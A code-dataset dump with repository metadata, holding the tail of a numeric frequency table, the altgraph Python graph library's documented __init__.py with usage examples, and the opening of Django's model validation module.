5178,1370,5179,5180,5181,5182,5183,5184,5185,5186,5187,5188,5189,5190,5191,5192,
5193,5194,5195,5196,5197,5198,1655,5199,5200,5201,5202,1656,5203,5204,5205,5206,
1371,5207,1372,5208,5209,5210,5211,1373,5212,5213,1374,5214,5215,5216,5217,5218,
5219,5220,5221,5222,5223,5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,
5235,5236,5237,5238,5239,5240,5241,5242,5243,5244,5245,5246,5247,1657,5248,5249,
5250,5251,1658,1263,5252,5253,5254,5255,5256,1375,5257,5258,5259,5260,5261,5262,
5263,5264,5265,5266,5267,5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,
5279,5280,5281,5282,5283,1659,5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,
5294,5295,5296,5297,5298,5299,5300,1660,5301,5302,5303,5304,5305,5306,5307,5308,
5309,5310,5311,5312,5313,5314,5315,5316,5317,5318,5319,5320,5321,1376,5322,5323,
5324,5325,5326,5327,5328,5329,5330,5331,5332,5333,1198,5334,5335,5336,5337,5338,
5339,5340,5341,5342,5343,1661,5344,5345,5346,5347,5348,5349,5350,5351,5352,5353,
5354,5355,5356,5357,5358,5359,5360,5361,5362,5363,5364,5365,5366,5367,5368,5369,
5370,5371,5372,5373,5374,5375,5376,5377,5378,5379,5380,5381,5382,5383,5384,5385,
5386,5387,5388,5389,5390,5391,5392,5393,5394,5395,5396,5397,5398,1264,5399,5400,
5401,5402,5403,5404,5405,5406,5407,5408,5409,5410,5411,5412,1662,5413,5414,5415,
5416,1663,5417,5418,5419,5420,5421,5422,5423,5424,5425,5426,5427,5428,5429,5430,
5431,5432,5433,5434,5435,5436,5437,5438,1664,5439,5440,5441,5442,5443,5444,5445,
5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456,5457,5458,5459,5460,5461,
5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472,5473,5474,5475,5476,5477,
5478,1154,5479,5480,5481,5482,5483,5484,5485,1665,5486,5487,5488,5489,5490,5491,
5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504,5505,5506,5507,
5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520,5521,5522,5523,
5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536,5537,5538,5539,
5540,5541,5542,5543,5544,5545,5546,5547,5548,1377,5549,5550,5551,5552,5553,5554,
5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568,5569,5570,
1114,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584,5585,
5586,5587,5588,5589,5590,5591,5592,1378,5593,5594,5595,5596,5597,5598,5599,5600,
5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,1379,5615,
5616,5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,
5632,5633,5634,1380,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,
5647,5648,5649,1381,1056,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,
1666,5661,5662,5663,5664,5665,5666,5667,5668,1667,5669,1668,5670,5671,5672,5673,
5674,5675,5676,5677,5678,1155,5679,5680,5681,5682,5683,5684,5685,5686,5687,5688,
5689,5690,5691,5692,5693,5694,5695,5696,5697,5698,1669,5699,5700,5701,5702,5703,
5704,5705,1670,5706,5707,5708,5709,5710,1671,5711,5712,5713,5714,1382,5715,5716,
5717,5718,5719,5720,5721,5722,5723,5724,5725,1672,5726,5727,1673,1674,5728,5729,
5730,5731,5732,5733,5734,5735,5736,1675,5737,5738,5739,5740,5741,5742,5743,5744,
1676,5745,5746,5747,5748,5749,5750,5751,1383,5752,5753,5754,5755,5756,5757,5758,
5759,5760,5761,5762,5763,5764,5765,5766,5767,5768,1677,5769,5770,5771,5772,5773,
1678,5774,5775,5776, 998,5777,5778,5779,5780,5781,5782,5783,5784,5785,1384,5786,
5787,5788,5789,5790,5791,5792,5793,5794,5795,5796,5797,5798,5799,5800,1679,5801,
5802,5803,1115,1116,5804,5805,5806,5807,5808,5809,5810,5811,5812,5813,5814,5815,
5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828,5829,5830,5831,
5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844,5845,5846,5847,
5848,5849,5850,5851,5852,5853,5854,5855,1680,5856,5857,5858,5859,5860,5861,5862,
5863,5864,1681,5865,5866,5867,1682,5868,5869,5870,5871,5872,5873,5874,5875,5876,
5877,5878,5879,1683,5880,1684,5881,5882,5883,5884,1685,5885,5886,5887,5888,5889,
5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905,
5906,5907,1686,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920,
5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,1687,
5936,5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,
5952,1688,1689,5953,1199,5954,5955,5956,5957,5958,5959,5960,5961,1690,5962,5963,
5964,5965,5966,5967,5968,5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,
5980,5981,1385,5982,1386,5983,5984,5985,5986,5987,5988,5989,5990,5991,5992,5993,
5994,5995,5996,5997,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6008,6009,
6010,6011,6012,6013,6014,6015,6016,6017,6018,6019,6020,6021,6022,6023,6024,6025,
6026,6027,1265,6028,6029,1691,6030,6031,6032,6033,6034,6035,6036,6037,6038,6039,
6040,6041,6042,6043,6044,6045,6046,6047,6048,6049,6050,6051,6052,6053,6054,6055,
6056,6057,6058,6059,6060,6061,6062,6063,6064,6065,6066,6067,6068,6069,6070,6071,
6072,6073,6074,6075,6076,6077,6078,6079,6080,6081,6082,6083,6084,1692,6085,6086,
6087,6088,6089,6090,6091,6092,6093,6094,6095,6096,6097,6098,6099,6100,6101,6102,
6103,6104,6105,6106,6107,6108,6109,6110,6111,6112,6113,6114,6115,6116,6117,6118,
6119,6120,6121,6122,6123,6124,6125,6126,6127,6128,6129,6130,6131,1693,6132,6133,
6134,6135,6136,1694,6137,6138,6139,6140,6141,1695,6142,6143,6144,6145,6146,6147,
6148,6149,6150,6151,6152,6153,6154,6155,6156,6157,6158,6159,6160,6161,6162,6163,
6164,6165,6166,6167,6168,6169,6170,6171,6172,6173,6174,6175,6176,6177,6178,6179,
6180,6181,6182,6183,6184,6185,1696,6186,6187,6188,6189,6190,6191,6192,6193,6194,
6195,6196,6197,6198,6199,6200,6201,6202,6203,6204,6205,6206,6207,6208,6209,6210,
6211,6212,6213,6214,6215,6216,6217,6218,6219,1697,6220,6221,6222,6223,6224,6225,
6226,6227,6228,6229,6230,6231,6232,6233,6234,6235,6236,6237,6238,6239,6240,6241,
6242,6243,6244,6245,6246,6247,6248,6249,6250,6251,6252,6253,1698,6254,6255,6256,
6257,6258,6259,6260,6261,6262,6263,1200,6264,6265,6266,6267,6268,6269,6270,6271, #1024
6272,6273,6274,6275,6276,6277,6278,6279,6280,6281,6282,6283,6284,6285,6286,6287,
6288,6289,6290,6291,6292,6293,6294,6295,6296,6297,6298,6299,6300,6301,6302,1699,
6303,6304,1700,6305,6306,6307,6308,6309,6310,6311,6312,6313,6314,6315,6316,6317,
6318,6319,6320,6321,6322,6323,6324,6325,6326,6327,6328,6329,6330,6331,6332,6333,
6334,6335,6336,6337,6338,6339,1701,6340,6341,6342,6343,6344,1387,6345,6346,6347,
6348,6349,6350,6351,6352,6353,6354,6355,6356,6357,6358,6359,6360,6361,6362,6363,
6364,6365,6366,6367,6368,6369,6370,6371,6372,6373,6374,6375,6376,6377,6378,6379,
6380,6381,6382,6383,6384,6385,6386,6387,6388,6389,6390,6391,6392,6393,6394,6395,
6396,6397,6398,6399,6400,6401,6402,6403,6404,6405,6406,6407,6408,6409,6410,6411,
6412,6413,1702,6414,6415,6416,6417,6418,6419,6420,6421,6422,1703,6423,6424,6425,
6426,6427,6428,6429,6430,6431,6432,6433,6434,6435,6436,6437,6438,1704,6439,6440,
6441,6442,6443,6444,6445,6446,6447,6448,6449,6450,6451,6452,6453,6454,6455,6456,
6457,6458,6459,6460,6461,6462,6463,6464,6465,6466,6467,6468,6469,6470,6471,6472,
6473,6474,6475,6476,6477,6478,6479,6480,6481,6482,6483,6484,6485,6486,6487,6488,
6489,6490,6491,6492,6493,6494,6495,6496,6497,6498,6499,6500,6501,6502,6503,1266,
6504,6505,6506,6507,6508,6509,6510,6511,6512,6513,6514,6515,6516,6517,6518,6519,
6520,6521,6522,6523,6524,6525,6526,6527,6528,6529,6530,6531,6532,6533,6534,6535,
6536,6537,6538,6539,6540,6541,6542,6543,6544,6545,6546,6547,6548,6549,6550,6551,
1705,1706,6552,6553,6554,6555,6556,6557,6558,6559,6560,6561,6562,6563,6564,6565,
6566,6567,6568,6569,6570,6571,6572,6573,6574,6575,6576,6577,6578,6579,6580,6581,
6582,6583,6584,6585,6586,6587,6588,6589,6590,6591,6592,6593,6594,6595,6596,6597,
6598,6599,6600,6601,6602,6603,6604,6605,6606,6607,6608,6609,6610,6611,6612,6613,
6614,6615,6616,6617,6618,6619,6620,6621,6622,6623,6624,6625,6626,6627,6628,6629,
6630,6631,6632,6633,6634,6635,6636,6637,1388,6638,6639,6640,6641,6642,6643,6644,
1707,6645,6646,6647,6648,6649,6650,6651,6652,6653,6654,6655,6656,6657,6658,6659,
6660,6661,6662,6663,1708,6664,6665,6666,6667,6668,6669,6670,6671,6672,6673,6674,
1201,6675,6676,6677,6678,6679,6680,6681,6682,6683,6684,6685,6686,6687,6688,6689,
6690,6691,6692,6693,6694,6695,6696,6697,6698,6699,6700,6701,6702,6703,6704,6705,
6706,6707,6708,6709,6710,6711,6712,6713,6714,6715,6716,6717,6718,6719,6720,6721,
6722,6723,6724,6725,1389,6726,6727,6728,6729,6730,6731,6732,6733,6734,6735,6736,
1390,1709,6737,6738,6739,6740,6741,6742,1710,6743,6744,6745,6746,1391,6747,6748,
6749,6750,6751,6752,6753,6754,6755,6756,6757,1392,6758,6759,6760,6761,6762,6763,
6764,6765,6766,6767,6768,6769,6770,6771,6772,6773,6774,6775,6776,6777,6778,6779,
6780,1202,6781,6782,6783,6784,6785,6786,6787,6788,6789,6790,6791,6792,6793,6794,
6795,6796,6797,6798,6799,6800,6801,6802,6803,6804,6805,6806,6807,6808,6809,1711,
6810,6811,6812,6813,6814,6815,6816,6817,6818,6819,6820,6821,6822,6823,6824,6825,
6826,6827,6828,6829,6830,6831,6832,6833,6834,6835,6836,1393,6837,6838,6839,6840,
6841,6842,6843,6844,6845,6846,6847,6848,6849,6850,6851,6852,6853,6854,6855,6856,
6857,6858,6859,6860,6861,6862,6863,6864,6865,6866,6867,6868,6869,6870,6871,6872,
6873,6874,6875,6876,6877,6878,6879,6880,6881,6882,6883,6884,6885,6886,6887,6888,
6889,6890,6891,6892,6893,6894,6895,6896,6897,6898,6899,6900,6901,6902,1712,6903,
6904,6905,6906,6907,6908,6909,6910,1713,6911,6912,6913,6914,6915,6916,6917,6918,
6919,6920,6921,6922,6923,6924,6925,6926,6927,6928,6929,6930,6931,6932,6933,6934,
6935,6936,6937,6938,6939,6940,6941,6942,6943,6944,6945,6946,6947,6948,6949,6950,
6951,6952,6953,6954,6955,6956,6957,6958,6959,6960,6961,6962,6963,6964,6965,6966,
6967,6968,6969,6970,6971,6972,6973,6974,1714,6975,6976,6977,6978,6979,6980,6981,
6982,6983,6984,6985,6986,6987,6988,1394,6989,6990,6991,6992,6993,6994,6995,6996,
6997,6998,6999,7000,1715,7001,7002,7003,7004,7005,7006,7007,7008,7009,7010,7011,
7012,7013,7014,7015,7016,7017,7018,7019,7020,7021,7022,7023,7024,7025,7026,7027,
7028,1716,7029,7030,7031,7032,7033,7034,7035,7036,7037,7038,7039,7040,7041,7042,
7043,7044,7045,7046,7047,7048,7049,7050,7051,7052,7053,7054,7055,7056,7057,7058,
7059,7060,7061,7062,7063,7064,7065,7066,7067,7068,7069,7070,7071,7072,7073,7074,
7075,7076,7077,7078,7079,7080,7081,7082,7083,7084,7085,7086,7087,7088,7089,7090,
7091,7092,7093,7094,7095,7096,7097,7098,7099,7100,7101,7102,7103,7104,7105,7106,
7107,7108,7109,7110,7111,7112,7113,7114,7115,7116,7117,7118,7119,7120,7121,7122,
7123,7124,7125,7126,7127,7128,7129,7130,7131,7132,7133,7134,7135,7136,7137,7138,
7139,7140,7141,7142,7143,7144,7145,7146,7147,7148,7149,7150,7151,7152,7153,7154,
7155,7156,7157,7158,7159,7160,7161,7162,7163,7164,7165,7166,7167,7168,7169,7170,
7171,7172,7173,7174,7175,7176,7177,7178,7179,7180,7181,7182,7183,7184,7185,7186,
7187,7188,7189,7190,7191,7192,7193,7194,7195,7196,7197,7198,7199,7200,7201,7202,
7203,7204,7205,7206,7207,1395,7208,7209,7210,7211,7212,7213,1717,7214,7215,7216,
7217,7218,7219,7220,7221,7222,7223,7224,7225,7226,7227,7228,7229,7230,7231,7232,
7233,7234,7235,7236,7237,7238,7239,7240,7241,7242,7243,7244,7245,7246,7247,7248,
7249,7250,7251,7252,7253,7254,7255,7256,7257,7258,7259,7260,7261,7262,7263,7264,
7265,7266,7267,7268,7269,7270,7271,7272,7273,7274,7275,7276,7277,7278,7279,7280,
7281,7282,7283,7284,7285,7286,7287,7288,7289,7290,7291,7292,7293,7294,7295,7296,
7297,7298,7299,7300,7301,7302,7303,7304,7305,7306,7307,7308,7309,7310,7311,7312,
7313,1718,7314,7315,7316,7317,7318,7319,7320,7321,7322,7323,7324,7325,7326,7327,
7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339,7340,7341,7342,7343,
7344,7345,7346,7347,7348,7349,7350,7351,7352,7353,7354,7355,7356,7357,7358,7359,
7360,7361,7362,7363,7364,7365,7366,7367,7368,7369,7370,7371,7372,7373,7374,7375,
7376,7377,7378,7379,7380,7381,7382,7383,7384,7385,7386,7387,7388,7389,7390,7391,
7392,7393,7394,7395,7396,7397,7398,7399,7400,7401,7402,7403,7404,7405,7406,7407,
7408,7409,7410,7411,7412,7413,7414,7415,7416,7417,7418,7419,7420,7421,7422,7423,
7424,7425,7426,7427,7428,7429,7430,7431,7432,7433,7434,7435,7436,7437,7438,7439,
7440,7441,7442,7443,7444,7445,7446,7447,7448,7449,7450,7451,7452,7453,7454,7455,
7456,7457,7458,7459,7460,7461,7462,7463,7464,7465,7466,7467,7468,7469,7470,7471,
7472,7473,7474,7475,7476,7477,7478,7479,7480,7481,7482,7483,7484,7485,7486,7487,
7488,7489,7490,7491,7492,7493,7494,7495,7496,7497,7498,7499,7500,7501,7502,7503,
7504,7505,7506,7507,7508,7509,7510,7511,7512,7513,7514,7515,7516,7517,7518,7519,
7520,7521,7522,7523,7524,7525,7526,7527,7528,7529,7530,7531,7532,7533,7534,7535,
7536,7537,7538,7539,7540,7541,7542,7543,7544,7545,7546,7547,7548,7549,7550,7551,
7552,7553,7554,7555,7556,7557,7558,7559,7560,7561,7562,7563,7564,7565,7566,7567,
7568,7569,7570,7571,7572,7573,7574,7575,7576,7577,7578,7579,7580,7581,7582,7583,
7584,7585,7586,7587,7588,7589,7590,7591,7592,7593,7594,7595,7596,7597,7598,7599,
7600,7601,7602,7603,7604,7605,7606,7607,7608,7609,7610,7611,7612,7613,7614,7615,
7616,7617,7618,7619,7620,7621,7622,7623,7624,7625,7626,7627,7628,7629,7630,7631,
7632,7633,7634,7635,7636,7637,7638,7639,7640,7641,7642,7643,7644,7645,7646,7647,
7648,7649,7650,7651,7652,7653,7654,7655,7656,7657,7658,7659,7660,7661,7662,7663,
7664,7665,7666,7667,7668,7669,7670,7671,7672,7673,7674,7675,7676,7677,7678,7679,
7680,7681,7682,7683,7684,7685,7686,7687,7688,7689,7690,7691,7692,7693,7694,7695,
7696,7697,7698,7699,7700,7701,7702,7703,7704,7705,7706,7707,7708,7709,7710,7711,
7712,7713,7714,7715,7716,7717,7718,7719,7720,7721,7722,7723,7724,7725,7726,7727,
7728,7729,7730,7731,7732,7733,7734,7735,7736,7737,7738,7739,7740,7741,7742,7743,
7744,7745,7746,7747,7748,7749,7750,7751,7752,7753,7754,7755,7756,7757,7758,7759,
7760,7761,7762,7763,7764,7765,7766,7767,7768,7769,7770,7771,7772,7773,7774,7775,
7776,7777,7778,7779,7780,7781,7782,7783,7784,7785,7786,7787,7788,7789,7790,7791,
7792,7793,7794,7795,7796,7797,7798,7799,7800,7801,7802,7803,7804,7805,7806,7807,
7808,7809,7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,
7824,7825,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,
7840,7841,7842,7843,7844,7845,7846,7847,7848,7849,7850,7851,7852,7853,7854,7855,
7856,7857,7858,7859,7860,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870,7871,
7872,7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886,7887,
7888,7889,7890,7891,7892,7893,7894,7895,7896,7897,7898,7899,7900,7901,7902,7903,
7904,7905,7906,7907,7908,7909,7910,7911,7912,7913,7914,7915,7916,7917,7918,7919,
7920,7921,7922,7923,7924,7925,7926,7927,7928,7929,7930,7931,7932,7933,7934,7935,
7936,7937,7938,7939,7940,7941,7942,7943,7944,7945,7946,7947,7948,7949,7950,7951,
7952,7953,7954,7955,7956,7957,7958,7959,7960,7961,7962,7963,7964,7965,7966,7967,
7968,7969,7970,7971,7972,7973,7974,7975,7976,7977,7978,7979,7980,7981,7982,7983,
7984,7985,7986,7987,7988,7989,7990,7991,7992,7993,7994,7995,7996,7997,7998,7999,
8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,
8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031,
8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047,
8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,
8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,
8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,
8096,8097,8098,8099,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111,
8112,8113,8114,8115,8116,8117,8118,8119,8120,8121,8122,8123,8124,8125,8126,8127,
8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141,8142,8143,
8144,8145,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155,8156,8157,8158,8159,
8160,8161,8162,8163,8164,8165,8166,8167,8168,8169,8170,8171,8172,8173,8174,8175,
8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,8187,8188,8189,8190,8191,
8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,8204,8205,8206,8207,
8208,8209,8210,8211,8212,8213,8214,8215,8216,8217,8218,8219,8220,8221,8222,8223,
8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239,
8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255,
8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271,
8272,8273,8274,8275,8276,8277,8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,
8288,8289,8290,8291,8292,8293,8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,
8304,8305,8306,8307,8308,8309,8310,8311,8312,8313,8314,8315,8316,8317,8318,8319,
8320,8321,8322,8323,8324,8325,8326,8327,8328,8329,8330,8331,8332,8333,8334,8335,
8336,8337,8338,8339,8340,8341,8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,
8352,8353,8354,8355,8356,8357,8358,8359,8360,8361,8362,8363,8364,8365,8366,8367,
8368,8369,8370,8371,8372,8373,8374,8375,8376,8377,8378,8379,8380,8381,8382,8383,
8384,8385,8386,8387,8388,8389,8390,8391,8392,8393,8394,8395,8396,8397,8398,8399,
8400,8401,8402,8403,8404,8405,8406,8407,8408,8409,8410,8411,8412,8413,8414,8415,
8416,8417,8418,8419,8420,8421,8422,8423,8424,8425,8426,8427,8428,8429,8430,8431,
8432,8433,8434,8435,8436,8437,8438,8439,8440,8441,8442,8443,8444,8445,8446,8447,
8448,8449,8450,8451,8452,8453,8454,8455,8456,8457,8458,8459,8460,8461,8462,8463,
8464,8465,8466,8467,8468,8469,8470,8471,8472,8473,8474,8475,8476,8477,8478,8479,
8480,8481,8482,8483,8484,8485,8486,8487,8488,8489,8490,8491,8492,8493,8494,8495,
8496,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506,8507,8508,8509,8510,8511,
8512,8513,8514,8515,8516,8517,8518,8519,8520,8521,8522,8523,8524,8525,8526,8527,
8528,8529,8530,8531,8532,8533,8534,8535,8536,8537,8538,8539,8540,8541,8542,8543,
8544,8545,8546,8547,8548,8549,8550,8551,8552,8553,8554,8555,8556,8557,8558,8559,
8560,8561,8562,8563,8564,8565,8566,8567,8568,8569,8570,8571,8572,8573,8574,8575,
8576,8577,8578,8579,8580,8581,8582,8583,8584,8585,8586,8587,8588,8589,8590,8591,
8592,8593,8594,8595,8596,8597,8598,8599,8600,8601,8602,8603,8604,8605,8606,8607,
8608,8609,8610,8611,8612,8613,8614,8615,8616,8617,8618,8619,8620,8621,8622,8623,
8624,8625,8626,8627,8628,8629,8630,8631,8632,8633,8634,8635,8636,8637,8638,8639,
8640,8641,8642,8643,8644,8645,8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,
8656,8657,8658,8659,8660,8661,8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,
8672,8673,8674,8675,8676,8677,8678,8679,8680,8681,8682,8683,8684,8685,8686,8687,
8688,8689,8690,8691,8692,8693,8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,
8704,8705,8706,8707,8708,8709,8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,
8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,
8736,8737,8738,8739,8740,8741)
# flake8: noqa
| mit | 6,151,471,407,183,996,000 | 76.144295 | 92 | 0.762452 | false |
joaormatos/anaconda | Anaconda/standalone/trunk/PyInstaller/lib/altgraph/__init__.py | 12 | 4907 | '''
altgraph - a python graph library
=================================
altgraph is a fork of `graphlib <http://pygraphlib.sourceforge.net>`_ tailored
to use newer Python 2.3+ features, including additional support used by the
py2app suite (modulegraph and macholib, specifically).
altgraph is a Python-based graph (network) representation and manipulation package.
It started out as an extension to the `graph_lib module <http://www.ece.arizona.edu/~denny/python_nest/graph_lib_1.0.1.html>`_
written by Nathan Denny; it has since been significantly optimized and expanded.
The :class:`altgraph.Graph.Graph` class is loosely modeled after the `LEDA <http://www.algorithmic-solutions.com/enleda.htm>`_
(Library of Efficient Datatypes) representation. The library
includes methods for constructing graphs, BFS and DFS traversals,
topological sort, finding connected components, shortest paths, as well as a number of
graph statistics functions. The library can also visualize graphs
via `graphviz <http://www.research.att.com/sw/tools/graphviz/>`_.
The package contains the following modules:
- the :py:mod:`altgraph.Graph` module contains the :class:`~altgraph.Graph.Graph` class that stores the graph data
- the :py:mod:`altgraph.GraphAlgo` module implements graph algorithms operating on graphs (:py:class:`~altgraph.Graph.Graph`} instances)
- the :py:mod:`altgraph.GraphStat` module contains functions for computing statistical measures on graphs
- the :py:mod:`altgraph.GraphUtil` module contains functions for generating, reading and saving graphs
- the :py:mod:`altgraph.Dot` module contains functions for displaying graphs via `graphviz <http://www.research.att.com/sw/tools/graphviz/>`_
- the :py:mod:`altgraph.ObjectGraph` module implements a graph of objects with a unique identifier
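As a rough sketch of the generator and statistics helpers, something along these
lines should work (``generate_random_graph`` and ``degree_dist`` are assumed
helper names from the modules above; verify them against your installed version)::
from altgraph import GraphUtil, GraphStat
# build a small random graph: 24 nodes, 50 edges (assumed helper)
graph = GraphUtil.generate_random_graph(24, 50)
# degree distribution of the resulting graph (assumed helper)
print GraphStat.degree_dist(graph)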
Installation
------------
Download and unpack the archive then type::
python setup.py install
This will install the library in the default location. For instructions on
how to customize the install procedure read the output of::
python setup.py --help install
To verify that the code works run the test suite::
python setup.py test
Example usage
-------------
Let's assume that we want to analyze the graph below (links to the full picture) GRAPH_IMG.
Our script then might look the following way::
from altgraph import Graph, GraphAlgo, Dot
# these are the edges
edges = [ (1,2), (2,4), (1,3), (2,4), (3,4), (4,5), (6,5),
(6,14), (14,15), (6, 15), (5,7), (7, 8), (7,13), (12,8),
(8,13), (11,12), (11,9), (13,11), (9,13), (13,10) ]
# creates the graph
graph = Graph.Graph()
for head, tail in edges:
graph.add_edge(head, tail)
# do a forward bfs starting from node 1
print graph.forw_bfs(1)
This will print the nodes in some breadth first order::
[1, 2, 3, 4, 5, 7, 8, 13, 11, 10, 12, 9]
If we wanted to get the hop-distance from node 1 to node 8
we could write::
print graph.get_hops(1, 8)
This will print the following::
[(1, 0), (2, 1), (3, 1), (4, 2), (5, 3), (7, 4), (8, 5)]
Node 1 is at 0 hops since it is the starting node, nodes 2,3 are 1 hop away ...
node 8 is 5 hops away. To find the shortest distance between two nodes you
can use::
print GraphAlgo.shortest_path(graph, 1, 12)
It will print the nodes on one of the shortest paths (if there are more than one)::
[1, 2, 4, 5, 7, 13, 11, 12]
To display the graph we can use the GraphViz backend::
dot = Dot.Dot(graph)
# display the graph on the monitor
dot.display()
# save it in an image file
dot.save_img(file_name='graph', file_type='gif')
..
@author: U{Istvan Albert<http://www.personal.psu.edu/staff/i/u/iua1/>}
@license: MIT License
Copyright (c) 2004 Istvan Albert unless otherwise noted.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do
so.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
@requires: Python 2.3 or higher
@newfield contributor: Contributors:
@contributor: U{Reka Albert <http://www.phys.psu.edu/~ralbert/>}
'''
__version__ = '0.7.0'
class GraphError(ValueError):
pass
| gpl-3.0 | 6,541,694,398,967,050,000 | 35.348148 | 147 | 0.707968 | false |
joshblum/django-with-audit | django/core/management/validation.py | 79 | 19846 | import sys
from django.core.management.color import color_style
from django.utils.itercompat import is_iterable
class ModelErrorCollection:
def __init__(self, outfile=sys.stdout):
self.errors = []
self.outfile = outfile
self.style = color_style()
def add(self, context, error):
self.errors.append((context, error))
self.outfile.write(self.style.ERROR("%s: %s\n" % (context, error)))
def get_validation_errors(outfile, app=None):
"""
Validates all models that are part of the specified app. If no app name is provided,
validates all models of all installed apps. Writes errors, if any, to outfile.
Returns number of errors.
"""
from django.conf import settings
from django.db import models, connection
from django.db.models.loading import get_app_errors
from django.db.models.fields.related import RelatedObject
from django.db.models.deletion import SET_NULL, SET_DEFAULT
e = ModelErrorCollection(outfile)
for (app_name, error) in get_app_errors().items():
e.add(app_name, error)
for cls in models.get_models(app):
opts = cls._meta
# Do field-specific validation.
for f in opts.local_fields:
if f.name == 'id' and not f.primary_key and opts.pk.name == 'id':
e.add(opts, '"%s": You can\'t use "id" as a field name, because each model automatically gets an "id" field if none of the fields have primary_key=True. You need to either remove/rename your "id" field or add primary_key=True to a field.' % f.name)
if f.name.endswith('_'):
e.add(opts, '"%s": Field names cannot end with underscores, because this would lead to ambiguous queryset filters.' % f.name)
if (f.primary_key and f.null and
not connection.features.interprets_empty_strings_as_nulls):
# We cannot reliably check this for backends like Oracle which
# consider NULL and '' to be equal (and thus set up
# character-based fields a little differently).
e.add(opts, '"%s": Primary key fields cannot have null=True.' % f.name)
if isinstance(f, models.CharField):
try:
max_length = int(f.max_length)
if max_length <= 0:
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
except (ValueError, TypeError):
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
if isinstance(f, models.DecimalField):
decimalp_ok, mdigits_ok = False, False
decimalp_msg ='"%s": DecimalFields require a "decimal_places" attribute that is a non-negative integer.'
try:
decimal_places = int(f.decimal_places)
if decimal_places < 0:
e.add(opts, decimalp_msg % f.name)
else:
decimalp_ok = True
except (ValueError, TypeError):
e.add(opts, decimalp_msg % f.name)
mdigits_msg = '"%s": DecimalFields require a "max_digits" attribute that is a positive integer.'
try:
max_digits = int(f.max_digits)
if max_digits <= 0:
e.add(opts, mdigits_msg % f.name)
else:
mdigits_ok = True
except (ValueError, TypeError):
e.add(opts, mdigits_msg % f.name)
invalid_values_msg = '"%s": DecimalFields require a "max_digits" attribute value that is greater than or equal to the value of the "decimal_places" attribute.'
if decimalp_ok and mdigits_ok:
if decimal_places > max_digits:
e.add(opts, invalid_values_msg % f.name)
if isinstance(f, models.FileField) and not f.upload_to:
e.add(opts, '"%s": FileFields require an "upload_to" attribute.' % f.name)
if isinstance(f, models.ImageField):
# Try to import PIL in either of the two ways it can end up installed.
